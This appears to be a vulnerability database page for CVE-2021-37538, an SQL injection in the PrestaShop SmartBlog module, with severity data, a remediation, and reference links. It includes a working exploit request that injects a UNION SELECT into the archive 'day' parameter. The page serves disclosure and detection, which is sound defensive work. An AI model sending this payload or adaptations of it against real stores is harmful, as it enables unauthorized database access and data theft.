🔙 목록으로 돌아가기

CVE-2021-37538: PrestaShop SmartBlog <4.0.6 - SQL Injection

TitlePrestaShop SmartBlog <4.0.6 - SQL Injection
Authorwhoever
SeverityCritical
ImpactAn attacker can gain unauthorized access to the database, extract sensitive information, modify data, or perform other malicious activities.
RemediationUpgrade PrestaShop SmartBlog to version 4.0.6 or later to mitigate the SQL Injection vulnerability.
CVSS Score9.8
EPSS Score0.89404
CVE IDCVE-2021-37538
CWE IDCWE-89
Tags cve2021 cve prestashop smartblog sqli smartdatasoft vkev vuln

🔍 Vulnerability Description

PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality.

🌐 HTTP Request

GET /module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; ClaudeBot/1.0; +claudebot@anthropic.com)
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-37538.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-37538.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A